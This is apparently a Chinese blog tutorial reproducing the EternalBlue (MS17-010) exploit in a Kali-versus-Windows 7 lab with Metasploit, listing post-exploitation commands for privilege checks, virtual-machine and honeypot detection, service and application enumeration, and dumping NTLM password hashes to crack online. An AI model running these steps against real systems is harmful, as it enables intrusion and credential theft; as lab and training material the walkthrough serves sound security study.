永恒之蓝复现

一、永恒之蓝漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、实验环境

kali linux(攻击者)
windows 7(靶机)

三、实验步骤

1.首先打开终端切换到root权限,这次我们使用到msfconsole(msfconsole 是 Metasploit 框架控制台的缩写,是一个功能强大且广泛使用的开源渗透测试框架)

2.然后我们查看一下win7的IP

3.到kail   输入search ms17-010

我们发现有这么多模块ms17-010也就是永恒之蓝 这个漏洞进行攻击,在这里我们选择这个模块,用show options 来查看我们需要设置什么东西,

 这样我们就设置好了要攻击的靶机IP,接下来我们看一下其他参数还有什么问题,好了没有问题就run一下

出现了这个玩意就代表我们攻击成功了

 这个是我们win7的ip。

4。接下里我们就来做后渗透,信息收集getuid

 这个system,是有system权限一般来说都是只要管理员权限我们就要进行提权,想要从管理员提升到system权限就要用到getsystem

查看磁盘情况:

run post/windows/gather/forensics/enum_drives

检查是否为虚拟机:

 run post/windows/gather/checkvm 

为什么要检查它是不是虚拟机呢,因为在渗透测试的过程中可能会碰到一种技术叫蜜罐,大多数的蜜罐都是布置在虚拟机里面的,如果你一番操作下来拿到了权限但是是虚拟机那就没啥用处,及时止损

查看服务:

run post/windows/gather/enum_services 

 列举有啥应用:

run post/windows/gather/enum_applications 

 列举有啥操作:(新建一个文件夹看看有啥变化)

run post/windows/gather/dumplinks 

一键扫描并且整理好:

run scraper

并放入隐藏文件夹里面: cd /root/.msf4/logs/scripts/scraper (ls查看一下)

cat hashes.txt查看一下

查出来的密文可以用www.cmd5.com查看一下,格式是NTLM。

乱码解决方法:

输入chcp 65001可将乱码解决

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值